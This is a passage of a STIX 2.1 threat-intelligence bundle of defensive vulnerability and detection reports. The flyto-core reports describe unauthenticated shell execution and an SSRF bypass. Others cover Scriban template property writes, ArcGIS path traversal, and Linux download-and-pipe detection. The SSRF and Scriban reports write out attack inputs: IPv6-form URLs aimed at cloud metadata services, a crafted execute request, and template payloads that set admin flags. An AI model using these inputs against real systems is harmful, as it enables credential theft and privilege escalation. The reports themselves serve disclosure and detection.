ArcGIS Server for critical mapping and spatial data operations, potentially across various sectors including government, critical infrastructure, and defense. The unauthenticated nature and high CVSS score indicate a significant risk, as exploitation does not require any prior access or legitimate user credentials.\n\n## Recommendation\n\n- Immediately patch all ArcGIS Server instances to a version that addresses CVE-2026-9181 as per the vendor advisory from Esri.\n- Review web server access logs for ArcGIS Server (found in `/var/log/apache2/access.log` for Apache, or IIS logs on Windows) for signs of directory traversal attempts, specifically requests containing `../`, `..%2f`, or similar path manipulation sequences in the URI.\n- Ensure proper network segmentation and firewall rules are in place to limit exposure of ArcGIS Server instances to untrusted networks, complementing the patching for `CVE-2026-9181`.\n",
      "published": "2026-07-06T19:20:57Z",
      "labels": [
        "directory-traversal",
        "web-vulnerability",
        "esri",
        "cve"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-9181"
        },
        {
          "source_name": "reference",
          "url": "https://www.esri.com/arcgis-blog/products/arcgis-enterprise/administration/may-2026-arcgis-security-bulletin"
        }
      ],
      "confidence": 95
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--70e13694-37b6-577e-b13f-c298fe858755",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--47162c0a-1d74-59bb-a489-54790334d30a",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--35e494d5-8c89-5bc4-9b3d-7744e80d6cf4",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--47162c0a-1d74-59bb-a489-54790334d30a",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--47162c0a-1d74-59bb-a489-54790334d30a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "flyto-core Unauthenticated Command Execution via HTTP MCP `execute_module`",
      "description": "## Overview\n\nflyto-core, an application leveraging FastAPI, is susceptible to an unauthenticated command execution vulnerability. This flaw exists within its HTTP MCP endpoint (`POST /mcp`), which lacks proper authentication and authorization checks. Discovered on 2026-07-06, the vulnerability allows unauthenticated attackers to send JSON-RPC `tools/call` requests that are then dispatched to arbitrary internal modules, including `sandbox.execute_shell`. This specific module executes attacker-controlled input directly via `asyncio.create_subprocess_shell` with `shell=True`, bypassing security controls. By default, flyto-core binds to `127.0.0.1`, making it a high-severity local vulnerability (CVSS 8.4); however, if configured to bind to `--host 0.0.0.0`, it becomes remotely exploitable, enabling full system compromise with root privileges as demonstrated in dynamic reproductions.\n\n## Attack Chain\n\n1.  Attacker sends an unauthenticated HTTP POST request to the `/mcp` endpoint of a vulnerable flyto-core server.\n2.  The `mcp_router` (mounted at `src/core/api/server.py:75-78`) receives the request without requiring authentication.\n3.  The `mcp_post` function (`src/core/api/routes/mcp.py:65-66`) processes the request body, which is an attacker-controlled JSON-RPC payload.\n4.  The `handle_jsonrpc_request` function (`src/core/api/routes/mcp.py:103-104`) forwards the JSON-RPC item containing a `tools/call` method with `name: execute_module` and `module_id: sandbox.execute_shell` to the module dispatcher.\n5.  The module registry (`src/core/mcp_handler.py:180`) resolves `sandbox.execute_shell` and invokes it with attacker-supplied `params`, including a `command` argument.\n6.  The `sandbox.execute_shell` module (`src/core/modules/atomic/sandbox/execute_shell.py:137-139`) extracts the `command` directly from `params` without sanitization.\n7.  The `command` is passed to `asyncio.create_subprocess_shell` with `shell=True` (`src/core/modules/atomic/sandbox/execute_shell.py:163-169`).\n8.  The flyto-core server process executes the arbitrary OS command supplied by the attacker, with the privileges of the server.\n\n## Impact\n\nThis unauthenticated command execution vulnerability carries critical impact. Any local process can exploit the vulnerability if `flyto serve` is running on a workstation, leading to arbitrary file operations, credential exfiltration, or lateral movement. More severely, if `flyto-core` is exposed externally (e.g., bound to `0.0.0.0`), unauthenticated remote attackers can achieve full system compromise with `root` privileges, as confirmed by dynamic reproduction. The vulnerability affects developers and local users running the service, as well as infrastructure operators who expose the API without proper network-level access controls. Consequences include complete host takeover.\n\n## Recommendation\n\n*   Deploy the provided Sigma rule to detect unauthenticated POST requests to `/mcp`.\n*   Inspect webserver logs for HTTP POST requests to the `/mcp` URI as an indicator of attempted exploitation.\n*   Patch affected flyto-core instances immediately by applying the recommended code changes from the source, specifically ensuring `require_auth` dependency for `/mcp` routes and adding `sandbox.*` to the `_DEFAULT_DENYLIST`.\n",
      "published": "2026-07-06T17:45:25Z",
      "labels": [
        "unauthenticated-rce",
        "command-injection",
        "web-application",
        "ghsa",
        "linux"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-h9f9-h6gm-wc85"
        }
      ],
      "confidence": 95
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--09bc1502-6a38-58fd-9349-0d77b078799b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--2a5b6109-4d8c-51c6-9dc5-4b400de8d794",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5c7b2996-04b0-587c-b2de-8b20afcc2de6",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Application Layer Protocol",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1071",
          "url": "https://attack.mitre.org/techniques/T1071"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--658ee854-da42-56db-951a-7e431d65f396",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--2a5b6109-4d8c-51c6-9dc5-4b400de8d794",
      "target_ref": "attack-pattern--5c7b2996-04b0-587c-b2de-8b20afcc2de6"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--2a5b6109-4d8c-51c6-9dc5-4b400de8d794",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Detecting Linux Payload Downloaded and Piped to Interpreter",
      "description": "## Overview\n\nThis threat describes a stealthy method employed by adversaries on Linux systems to execute arbitrary code. It involves an initial interpreter (such as a shell, Python, Perl, or Node.js) making an outbound network connection to download a malicious payload. Crucially, this payload is not written to disk but is directly piped as input into a second interpreter (often another shell instance, or a scripting language runtime) for immediate execution. This technique helps attackers evade detection by bypassing file-based security controls and minimizing forensic artifacts. While this brief does not detail a specific campaign, the technique is widely used across various threat groups for initial access, backdoor deployment, or data exfiltration.\n\n## Attack Chain\n\nThis brief focuses on a specific execution technique rather than a multi-stage campaign:\n\n1.  **Initial Compromise (Implied):** An attacker gains initial access to a Linux system through various means (e.g., exploitation of a vulnerable service, compromised credentials, or successful phishing).\n2.  **Network Connection by Interpreter:** A command-line interpreter (e.g., `bash`, `python`, `curl`) is executed to initiate an outbound network connection to a malicious command-and-control (C2) server.\n3.  **Payload Download:** The C2 server delivers a malicious script or binary payload over the established network connection.\n4.  **In-Memory Piping:** Instead of writing the downloaded payload to a file, the output stream from the download utility is immediately piped (`|`) into another command-line interpreter.\n5.  **Interpreter Execution:** The second interpreter (e.g., `sh`, `bash`, `python`) receives the malicious payload directly as its standard input and executes it in memory.\n6.  **Malicious Activity:** The executed payload then performs its intended malicious function, such as establishing persistence, exfiltrating data, or launching further attacks.\n\n## Impact\n\nSuccessful execution of payloads using this technique can lead to significant compromise of Linux systems. Because the payload is executed in memory without touching disk, it complicates traditional endpoint detection and incident response efforts. Consequences include system backdooring, complete system takeover, deployment of ransomware, data theft, and lateral movement within the network. This method is particularly effective against environments with weak network egress filtering and endpoint visibility into process command lines.\n\n## Recommendation\n\n*   Deploy the Sigma rule provided in this brief to your SIEM/EDR and tune for your Linux environment.\n*   Ensure comprehensive `process_creation` logging is enabled for all Linux endpoints to capture command-line arguments.\n*   Implement robust egress filtering at the network perimeter to restrict outbound connections from internal systems to known malicious IP addresses or unexpected ports and protocols, especially for common interpreter binaries.\n*   Regularly audit the `command_line` arguments of interpreters like `bash`, `sh`, `python`, and `perl` for suspicious download and pipe patterns, as detected by the rule above.\n",
      "published": "2026-07-06T17:39:20Z",
      "labels": [
        "execution",
        "defense-evasion",
        "command-and-control",
        "linux"
      ],
      "object_refs": [
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
        "attack-pattern--5c7b2996-04b0-587c-b2de-8b20afcc2de6"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/elastic/detection-rules/blob/main/rules/linux/execution_payload_downloaded_by_interpreter_and_piped_to_interpreter.toml"
        }
      ],
      "confidence": 60
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploitation for Privilege Escalation",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1068",
          "url": "https://attack.mitre.org/techniques/T1068"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--67662e22-d8ee-53b9-8452-09043f090aed",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--02b7defc-0b7c-533f-a00b-c5305857f963",
      "target_ref": "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Impair Defenses",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1562",
          "url": "https://attack.mitre.org/techniques/T1562"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--76449545-95d5-56ca-9ea9-a7cf4695ac32",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--02b7defc-0b7c-533f-a00b-c5305857f963",
      "target_ref": "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--02b7defc-0b7c-533f-a00b-c5305857f963",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Scriban Template Engine Vulnerability: Arbitrary CLR Property Writes (Mass Assignment \u0026 Setter Bypass)",
      "description": "## Overview\n\nA critical vulnerability exists in the Scriban templating engine (versions \u003c= 7.2.1) where its `TypedObjectAccessor` component permits template code to arbitrarily write to properties of Common Language Runtime (CLR) objects pushed into a `TemplateContext`. This flaw encompasses two primary weaknesses: mass assignment of public setters (CWE-915) and an access-modifier bypass (CWE-284), which allows templates to modify properties declared with `private set`, `internal set`, or `init` modifiers. The `TypedObjectAccessor` fails to perform `CanWrite` or setter-visibility checks, enabling reflective invocation of property setters. This means that a malicious template can alter sensitive data or application state, such as elevating privileges (e.g., setting `user.is_admin` to `true`) directly on the host application's live objects. The changes persist even after the template rendering completes. The `init` keyword bypass specifically affects applications running on .NET 5.0 and later versions, while `private set` and `internal set` bypasses affect all supported runtimes.\n\n## Attack Chain\n\n1.  **Application Embeds Host Object:** A host .NET application initializes a Scriban `TemplateContext` and pushes a sensitive CLR object (e.g., a `User` object) into it using a `ScriptObject` (e.g., `so[\"user\"] = currentUser; context.PushGlobal(so);`).\n2.  **Malicious Template Content:** An attacker introduces or manipulates Scriban template code executed by the host application to include an assignment operation targeting a property of the embedded CLR object (e.g., `{{ user.IsAdmin = true }}`, `{{ order.TotalPrice = 0 }}`, or `{{ config.SensitiveSetting = 'malicious_value' }}`).\n3.  **Template Execution Initiated:** The host application calls a method like `Render()` on the Scriban template, triggering its execution.\n4.  **Vulnerable Accessor Invocation:** During template execution, when the malicious assignment is encountered, Scriban's internal dispatch mechanism calls `TypedObjectAccessor.TrySetValue` for the targeted property.\n5.  **Setter Visibility Bypass:** The `TypedObjectAccessor.TrySetValue` method, specifically in lines 108–123 of `TypedObjectAccessor.cs`, proceeds without verifying the `CanWrite` status of the property or checking the visibility (e.g., `private set`, `internal set`) or `init` status of its setter.\n6.  **Reflection Property Modification:** The vulnerability allows the `propertyAccessor.SetValue` method to be directly invoked via reflection, bypassing the standard C# access modifiers and developer intent for restricted properties.\n7.  **Persistent Property Alteration:** The live CLR object instance within the host application has its property value permanently altered. These changes persist after the template rendering operation has completed.\n8.  **Unauthorized Data Modification/Privilege Escalation:** The host application continues execution with the maliciously altered object property, leading to unintended consequences such as unauthorized privilege escalation, data corruption, or configuration changes.\n\n## Impact\n\nThe vulnerability in Scriban can lead to severe data integrity issues and potential privilege escalation within host applications. By exploiting this flaw, attackers can bypass critical C# access modifiers (`private set`, `internal set`, `init`) and modify any CLR object property exposed to the template engine. This could result in unauthorized administrative access if a `user.is_admin` property is toggled, financial manipulation if `order.total_price` is set to zero, or critical system configuration changes. The altered state persists in the live application object, meaning the impact is immediate and enduring until the application state is reset or the object is reloaded, compromising the application's security and reliability.\n\n## Recommendation\n\n*   Review all Scriban templates and the host application's interaction with `TemplateContext` to identify and restrict the types of CLR objects exposed.\n*   As no patch currently exists, implement custom controls as described in the remediation \"Fix 2\" in the reference advisory: add a `MemberWriteFilter` on `TemplateContext` or use a `[ScriptMemberReadOnly]` attribute to explicitly control write access to properties.\n*   Regularly monitor the Scriban project's GitHub repository or NuGet feed for a patched version (`nuget/Scriban`) and apply it immediately once available.\n*   Review application code for `TypedObjectAccessor` usage and its implications, paying close attention to sensitive properties that are pushed into the `TemplateContext`.\n",
      "published": "2026-07-06T17:38:12Z",
      "labels": [
        "templating-engine",
        "mass-assignment",
        "access-control-bypass",
        "vulnerability",
        "csharp",
        "dotnet"
      ],
      "object_refs": [
        "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19",
        "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-7jvp-hj45-2f2m"
        },
        {
          "source_name": "reference",
          "url": "https://learn.microsoft.com/dotnet/api/system.reflection.propertyinfo.setvalue"
        },
        {
          "source_name": "reference",
          "url": "https://learn.microsoft.com/dotnet/csharp/language-reference/proposals/csharp-9.0/init"
        },
        {
          "source_name": "reference",
          "url": "https://cwe.mitre.org/data/definitions/915.html"
        },
        {
          "source_name": "reference",
          "url": "https://cwe.mitre.org/data/definitions/284.html"
        }
      ],
      "confidence": 80
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--2c20cd99-6c34-5699-b7ae-454fa34c9daa",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: http://[64:ff9b::a9fe:a9fe]/latest/meta-data/",
      "pattern": "[url:value = 'http://[64:ff9b::a9fe:a9fe]/latest/meta-data/']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T17:36:55Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--557b9a76-fa24-5d81-92e6-ef416b4f2858",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--c4c6ccf4-b83f-51e1-bdaf-0d5cd9663c33",
      "target_ref": "indicator--2c20cd99-6c34-5699-b7ae-454fa34c9daa"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--e7912ed4-3673-51b4-9e5b-1a300a93c0e0",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "domain: metadata.google.internal",
      "pattern": "[domain-name:value = 'metadata.google.internal']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T17:36:55Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--7759b344-f531-5b05-ad4e-925da9e68c3c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--c4c6ccf4-b83f-51e1-bdaf-0d5cd9663c33",
      "target_ref": "indicator--e7912ed4-3673-51b4-9e5b-1a300a93c0e0"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--b4090896-7af5-55e9-82ee-c236bd1f3633",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "ip: 169.254.169.254",
      "pattern": "[ipv4-addr:value = '169.254.169.254']",
      "pattern_type": "stix",
      "valid_from": "2026-07-06T17:36:55Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--099a67db-5b09-5552-bf45-5a2694b964ba",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--c4c6ccf4-b83f-51e1-bdaf-0d5cd9663c33",
      "target_ref": "indicator--b4090896-7af5-55e9-82ee-c236bd1f3633"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Impair Defenses",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1562",
          "url": "https://attack.mitre.org/techniques/T1562"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--f3e8a92f-2c6b-5d98-935d-48eebf548cd3",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--c4c6ccf4-b83f-51e1-bdaf-0d5cd9663c33",
      "target_ref": "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--c5addc90-3a19-5e9b-b356-3b3172f3355b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Cloud APIs",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1538",
          "url": "https://attack.mitre.org/techniques/T1538"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--4e147486-8004-552e-acfb-35d0a7792349",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--c4c6ccf4-b83f-51e1-bdaf-0d5cd9663c33",
      "target_ref": "attack-pattern--c5addc90-3a19-5e9b-b356-3b3172f3355b"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Data from Local System",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1005",
          "url": "https://attack.mitre.org/techniques/T1005"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--8970398d-5af6-5e7f-bb68-1c8b0991afb6",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--c4c6ccf4-b83f-51e1-bdaf-0d5cd9663c33",
      "target_ref": "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--c4c6ccf4-b83f-51e1-bdaf-0d5cd9663c33",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "flyto-core SSRF Bypass via IPv6 Transition Addresses (CWE-918)",
      "description": "## Overview\n\nThe `flyto-core` application, developed by flytohub, contains a critical Server-Side Request Forgery (SSRF) vulnerability, identified as CWE-918, in its `validate_url_ssrf` function, specifically within the `is_private_ip` helper in `src/core/utils.py`. This vulnerability, published on 2026-07-06, allows an authenticated workflow author to bypass the intended SSRF protection by utilizing IPv6 transition addresses. The application's guard, designed to block access to private and cloud metadata services, fails to correctly identify private IP addresses embedded within IPv4-mapped, 6to4, or NAT64 IPv6 formats. This oversight enables attackers to craft URLs using these unblocked IPv6 forms to access internal resources like cloud instance metadata services (e.g., `169.254.169.254`) or internal loopback services. The response body from these internal services is then returned to the attacker, resulting in a read SSRF that can lead to the exfiltration of sensitive information, such as IAM credentials. This bypass directly undermines the project's documented security controls.\n\n## Attack Chain\n\n1.  A workflow author, possessing valid authentication credentials for `flyto-core`'s Execution API (`POST /v1/execute`), prepares to execute a module.\n2.  The attacker crafts a malicious URL containing an IPv6 transition-form host, such as `http://[::ffff:127.0.0.1]:8080/` for loopback access or `http://[64:ff9b::a9fe:a9fe]/latest/meta-data/` for cloud instance metadata.\n3.  The attacker sends a `POST` request to `http://127.0.0.1:8333/v1/execute` with a JSON payload including `{\"module_id\":\"http.get\", \"params\":{\"url\":\"[malicious_url]\"}}`.\n4.  The `flyto-core` application invokes `validate_url_ssrf`, which calls `is_private_ip()` on the IPv6 transition address. Due to the vulnerability, `is_private_ip()` incorrectly returns `False`.\n5.  The `http.get` atomic module proceeds to initiate an outbound HTTP GET request using `aiohttp` to the internal destination specified by the crafted URL.\n6.  The internal service (e.g., cloud metadata service or a local web server) processes the request and returns its sensitive response body.\n7.  `flyto-core` receives the internal service's response and, as part of the `http.get` module's functionality, returns the full response body to the attacker in the `/v1/execute` API response.\n8.  The attacker successfully exfiltrates sensitive data, such as IAM credentials or internal service information, via a read Server-Side Request Forgery.\n\n## Impact\n\nThe vulnerability allows an authenticated workflow author to bypass `flyto-core`'s security controls and perform read Server-Side Request Forgery (SSRF). This directly enables data exfiltration from internal services that are typically isolated from external access. Specifically, attackers can access cloud instance metadata services (e.g., `169.254.169.254`) to steal highly sensitive IAM credentials and instance identity information. Additionally, the bypass permits access to internal loopback and RFC 1918 services, potentially exposing other sensitive internal applications or data. The success of this attack directly undermines the intended security model of `flyto-core`, which explicitly documents these checks as critical security controls. While the source does not provide victim numbers, any organization using `flyto-core` is susceptible, especially those deployed in cloud environments.\n\n## Recommendation\n\n*   Immediately apply the patch provided by flytohub, which modifies `src/core/utils.py` to correctly identify and block private IP addresses embedded within IPv6 transition forms, as demonstrated in the \"Suggested fix\" section of this brief.\n*   Review all `flyto-core` deployments, especially those in cloud environments, to ensure proper network segmentation and defense-in-depth measures limit the impact of potential SSRF vulnerabilities.\n*   Monitor network egress logs for connections originating from `flyto-core` instances to unusual or internal-only IPv6 addresses, particularly those resembling the IPv4-mapped `::ffff:169.254.169.254`, NAT64 `64:ff9b::/96`, or 6to4 `2002::/16` prefixes.\n*   Ensure that cloud metadata services and other sensitive internal endpoints are configured with least privilege access and minimal exposed information, assuming they might eventually be accessed by an SSRF attack.\n",
      "published": "2026-07-06T17:36:55Z",
      "labels": [
        "ssrf",
        "vulnerability",
        "python",
        "defense-evasion"
      ],
      "object_refs": [
        "indicator--2c20cd99-6c34-5699-b7ae-454fa34c9daa",
        "indicator--e7912ed4-3673-51b4-9e5b-1a300a93c0e0",
        "indicator--b4090896-7af5-55e9-82ee-c236bd1f3633",
        "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b",
        "attack-pattern--c5addc90-3a19-5e9b-b356-3b3172f3355b",
        "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-794r-5rp2-fpg8"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--d8100894-0062-563c-a81b-7f4820e4cb88",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "User Execution",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1204",
          "url": "https://attack.mitre.org/techniques/T1204"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--6ce7a9e9-5ea1-5644-8b1d-23f85f74e35d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--7193bc23-af16-56e3-a2ff-b1b37551d1ce",
      "target_ref": "attack-pattern--d8100894-0062-563c-a81b-7f4820e4cb88"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--7193bc23-af16-56e3-a2ff-b1b37551d1ce",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Suspicious XDG-Open Command Execution on Linux",
      "description": "## Overview\n\nThis intelligence describes a detection opportunity concerning the `xdg-open` utility on Linux systems. While `xdg-open` is a legitimate command used to open files or URLs in a user's preferred desktop application, it can be leveraged by adversaries as part of an initial access or execution chain. Attackers might craft spearphishing emails containing malicious links or documents that, when opened by the user, trigger `xdg-open` to execute their payload. This technique relies on user interaction (User Execution, T1204) to bypass security controls and initiate further malicious activity. This specific detection rule, developed by Elastic, targets the execution of `xdg-open` itself, aiming to identify instances where it might be invoked as a result of user interaction with malicious content. The rule was published on July 2nd, 2026, and provides a generic detection for this common Linux utility's suspicious usage.\n\n## Attack Chain\n\n1.  **Initial Access / User Interaction**: An attacker sends a spearphishing email or hosts a malicious website presenting a malicious link or file (e.g., a `.desktop` file, a crafted document, or a URL).\n2.  **User Execution**: The target user, tricked by social engineering, interacts with the malicious content, either by clicking a link or opening a file.\n3.  **`xdg-open` Invocation**: The user's desktop environment or a script silently invokes `xdg-open` to handle the malicious link or file, believing it to be legitimate.\n4.  **Malicious Payload Delivery/Execution**: `xdg-open` attempts to open the attacker-controlled resource, which could be a remote URL hosting an exploit, a local malicious script, or a document embedded with macros or other executable content.\n5.  **Initial Compromise**: Successful exploitation leads to arbitrary code execution on the user's system.\n6.  **Further Actions**: The attacker can then establish persistence, exfiltrate data, or deploy additional malware.\n\n## Impact\n\nA successful exploit leveraging `xdg-open` can lead to initial system compromise, allowing attackers to execute arbitrary code with the privileges of the compromised user. Depending on the payload delivered, this could result in data exfiltration, installation of ransomware or other malware, or the establishment of a foothold for lateral movement within the network. This technique is often used as a gateway for more extensive attacks, impacting user workstations and potentially leading to broader organizational breaches. The primary impact is the loss of confidentiality, integrity, and availability of data and systems.\n\n## Recommendation\n\n*   Deploy the provided Sigma rule to your SIEM/EDR platform to detect suspicious `xdg-open` command executions on Linux endpoints.\n*   Ensure process creation logging for Linux systems (`process_creation` category, `linux` product) is enabled and forwarded to your security platforms for analysis.\n*   Educate users about the risks of opening unsolicited attachments or clicking on suspicious links to mitigate the effectiveness of User Execution (T1204).\n",
      "published": "2026-07-06T17:32:11Z",
      "labels": [
        "endpoint",
        "linux",
        "execution",
        "user-execution",
        "initial-access",
        "detection-rule"
      ],
      "object_refs": [
        "attack-pattern--d8100894-0062-563c-a81b-7f4820e4cb88"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/elastic/detection-rules/blob/main/rules/linux/execution_suspicious_xdg_open_command_execution.toml"
        }
      ],
      "confidence": 60
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--9febe61e-7170-505d-b11c-0180a3aabe93",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Remote Access Tools",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1219",
          "url": "https://attack.mitre.org/techniques/T1219"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--ac12c5a2-820d-5aa8-9449-3e062f0c9ad7",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
